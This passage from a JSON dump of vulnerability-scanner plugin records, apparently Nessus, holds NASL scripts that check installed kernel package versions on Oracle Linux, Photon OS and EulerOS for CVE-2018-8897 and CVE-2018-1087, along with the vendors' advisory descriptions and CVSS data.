audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2018-8897\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2018-4097\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-2.6.39-400.298.7.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-2.6.39-400.298.7.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-debug-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-debug-devel-2.6.39-400.298.7.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-devel-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-devel-2.6.39-400.298.7.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-doc-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-doc-2.6.39-400.298.7.el6uek\")) flag++;\nif (rpm_exists(release:\"EL6\", rpm:\"kernel-uek-firmware-2.6.39\") && rpm_check(release:\"EL6\", reference:\"kernel-uek-firmware-2.6.39-400.298.7.el6uek\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-02-21T01:41:56", "description": "An update of 'linux', 'linux-esx' packages of Photon OS has been released.", "edition": 8, "published": "2018-08-17T00:00:00", "title": "Photon OS 1.0: Linux PHSA-2018-1.0-0132-(a) (deprecated)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-8897"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0132-A.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=111933", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0132-(a). The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111933);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\"CVE-2018-8897\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2018-1.0-0132-(a) (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of 'linux', 'linux-esx' packages of Photon OS has been\nreleased.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-1.0-132-a\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f10bac5d\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8897\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:linux\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"linux-4.4.130-1.ph1\",\n \"linux-api-headers-4.4.130-1.ph1\",\n \"linux-debuginfo-4.4.130-1.ph1\",\n \"linux-dev-4.4.130-1.ph1\",\n \"linux-docs-4.4.130-1.ph1\",\n \"linux-drivers-gpu-4.4.130-1.ph1\",\n \"linux-esx-4.4.130-1.ph1\",\n \"linux-esx-debuginfo-4.4.130-1.ph1\",\n \"linux-esx-devel-4.4.130-1.ph1\",\n \"linux-esx-docs-4.4.130-1.ph1\",\n \"linux-oprofile-4.4.130-1.ph1\",\n \"linux-sound-4.4.130-1.ph1\",\n \"linux-tools-4.4.130-1.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-09-14T12:49:15", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A statement in the System Programming Guide of the\n Intel 64 and IA-32 Architectures Software Developer's\n Manual (SDM) was mishandled in the development of some\n or all operating-system kernels, resulting in\n unexpected behavior for #DB exceptions that are\n deferred by MOV SS or POP SS, as demonstrated by (for\n example) privilege escalation in Windows, macOS, some\n Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL i1/4oe 3,\n the debug exception is delivered after the transfer to\n CPL i1/4oe 3 is complete. OS kernels may not expect this\n order of events and may therefore experience unexpected\n behavior when it occurs.i1/4^CVE-2018-8897)\n\n - On x86, MOV SS and POP SS behave strangely if they\n encounter a data breakpoint. If this occurs in a KVM\n guest, KVM incorrectly thinks that a #DB instruction\n was caused by the undocumented ICEBP instruction. This\n results in #DB being delivered to the guest kernel with\n an incorrect RIP on the stack. On most guest kernels,\n this will allow a guest user to DoS the guest kernel or\n even to escalate privilege to that of the guest kernel.\n (CVE-2018-1087)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-16T00:00:00", "title": "EulerOS 2.0 SP3 : kernel (EulerOS-SA-2018-1121)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1087", "CVE-2018-8897"], "modified": "2018-05-16T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1121.NASL", "href": "https://www.tenable.com/plugins/nessus/109813", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109813);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/04\");\n\n script_cve_id(\n \"CVE-2018-1087\",\n \"CVE-2018-8897\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : kernel (EulerOS-SA-2018-1121)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A statement in the System Programming Guide of the\n Intel 64 and IA-32 Architectures Software Developer's\n Manual (SDM) was mishandled in the development of some\n or all operating-system kernels, resulting in\n unexpected behavior for #DB exceptions that are\n deferred by MOV SS or POP SS, as demonstrated by (for\n example) privilege escalation in Windows, macOS, some\n Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL i1/4oe 3,\n the debug exception is delivered after the transfer to\n CPL i1/4oe 3 is complete. OS kernels may not expect this\n order of events and may therefore experience unexpected\n behavior when it occurs.i1/4^CVE-2018-8897)\n\n - On x86, MOV SS and POP SS behave strangely if they\n encounter a data breakpoint. If this occurs in a KVM\n guest, KVM incorrectly thinks that a #DB instruction\n was caused by the undocumented ICEBP instruction. This\n results in #DB being delivered to the guest kernel with\n an incorrect RIP on the stack. On most guest kernels,\n this will allow a guest user to DoS the guest kernel or\n even to escalate privilege to that of the guest kernel.\n (CVE-2018-1087)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1121\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d183c3d2\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-514.44.5.10.h80\",\n \"kernel-debuginfo-3.10.0-514.44.5.10.h80\",\n \"kernel-debuginfo-common-x86_64-3.10.0-514.44.5.10.h80\",\n \"kernel-devel-3.10.0-514.44.5.10.h80\",\n \"kernel-headers-3.10.0-514.44.5.10.h80\",\n \"kernel-tools-3.10.0-514.44.5.10.h80\",\n \"kernel-tools-libs-3.10.0-514.44.5.10.h80\",\n \"perf-3.10.0-514.44.5.10.h80\",\n \"python-perf-3.10.0-514.44.5.10.h80\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T12:49:15", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A statement in the System Programming Guide of the\n Intel 64 and IA-32 Architectures Software Developer's\n Manual (SDM) was mishandled in the development of some\n or all operating-system kernels, resulting in\n unexpected behavior for #DB exceptions that are\n deferred by MOV SS or POP SS, as demonstrated by (for\n example) privilege escalation in Windows, macOS, some\n Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL i1/4oe 3,\n the debug exception is delivered after the transfer to\n CPL i1/4oe 3 is complete. OS kernels may not expect this\n order of events and may therefore experience unexpected\n behavior when it occurs.i1/4^CVE-2018-8897)\n\n - On x86, MOV SS and POP SS behave strangely if they\n encounter a data breakpoint. If this occurs in a KVM\n guest, KVM incorrectly thinks that a #DB instruction\n was caused by the undocumented ICEBP instruction. This\n results in #DB being delivered to the guest kernel with\n an incorrect RIP on the stack. On most guest kernels,\n this will allow a guest user to DoS the guest kernel or\n even to escalate privilege to that of the guest kernel.\n (CVE-2018-1087)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 22, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-09T00:00:00", "title": "EulerOS 2.0 SP1 : kernel (EulerOS-SA-2018-1119)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1087", "CVE-2018-8897"], "modified": "2018-05-09T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1119.NASL", "href": "https://www.tenable.com/plugins/nessus/109619", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109619);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/04\");\n\n script_cve_id(\n \"CVE-2018-1087\",\n \"CVE-2018-8897\"\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : kernel (EulerOS-SA-2018-1119)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A statement in the System Programming Guide of the\n Intel 64 and IA-32 Architectures Software Developer's\n Manual (SDM) was mishandled in the development of some\n or all operating-system kernels, resulting in\n unexpected behavior for #DB exceptions that are\n deferred by MOV SS or POP SS, as demonstrated by (for\n example) privilege escalation in Windows, macOS, some\n Xen configurations, or FreeBSD, or a Linux kernel\n crash. The MOV to SS and POP SS instructions inhibit\n interrupts (including NMIs), data breakpoints, and\n single step trap exceptions until the instruction\n boundary following the next instruction (SDM Vol. 3A\n section 6.8.3). (The inhibited data breakpoints are\n those on memory accessed by the MOV to SS or POP to SS\n instruction itself.) Note that debug exceptions are not\n inhibited by the interrupt enable (EFLAGS.IF) system\n flag (SDM Vol. 3A section 2.3). If the instruction\n following the MOV to SS or POP to SS instruction is an\n instruction like SYSCALL, SYSENTER, INT 3, etc. that\n transfers control to the operating system at CPL i1/4oe 3,\n the debug exception is delivered after the transfer to\n CPL i1/4oe 3 is complete. OS kernels may not expect this\n order of events and may therefore experience unexpected\n behavior when it occurs.i1/4^CVE-2018-8897)\n\n - On x86, MOV SS and POP SS behave strangely if they\n encounter a data breakpoint. If this occurs in a KVM\n guest, KVM incorrectly thinks that a #DB instruction\n was caused by the undocumented ICEBP instruction. This\n results in #DB being delivered to the guest kernel with\n an incorrect RIP on the stack. On most guest kernels,\n this will allow a guest user to DoS the guest kernel or\n even to escalate privilege to that of the guest kernel.\n (CVE-2018-1087)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1119\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?719c09bd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Windows POP/MOV SS Local Privilege Elevation Vulnerability');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"kernel-3.10.0-229.49.1.180\",\n \"kernel-debuginfo-3.10.0-229.49.1.180\",\n \"kernel-debuginfo-common-x86_64-3.10.0-229.49.1.180\",\n \"kernel-devel-3.10.0-229.49.1.180\",\n \"kernel-headers-3.10.0-229.49.1.180\",\n \"kernel-tools-3.10.0-229.49.1.180\",\n \"kernel-tools-libs-3.10.0-229.49.1.180\",\n \"perf-3.10.0-229.49.1.180\",\n \"python-perf-3.10.0-229.49.1.180\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T17:23:59", "description": "Description of changes:\n\n[4.1.12-124.14.5.el7uek]\n- vhost/scsi: fix reuse of vq->iov[out] in response (Benjamin \nCoddington) [Orabug: 27928330]\n\n[4.1.12-124.14.4.el7uek]\n- kernel.spec: add requires system-release for OL7 (Brian Maly) \n[Orabug: 27955380]\n- x86/kernel/traps.c: fix trace_die_notifier return value (Kris Van \nHees) {CVE-2018-8897}\n- x86/entry/64: Dont use IST entry for #BP stack (Andy Lutomirski) \n{CVE-2018-8897}\n- kvm/x86: fix icebp instruction handling (<A HREF='https://oss.oracle.com/mailman/listinfo/el-errata'>gregkh at linuxfoundation.org</A>) \n{CVE-2018-1087}", "edition": 23, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-05-09T00:00:00", "title": "Oracle Linux 6 / 7 : Unbreakable Enterprise kernel (ELSA-2018-4096)", "type": "nessus", 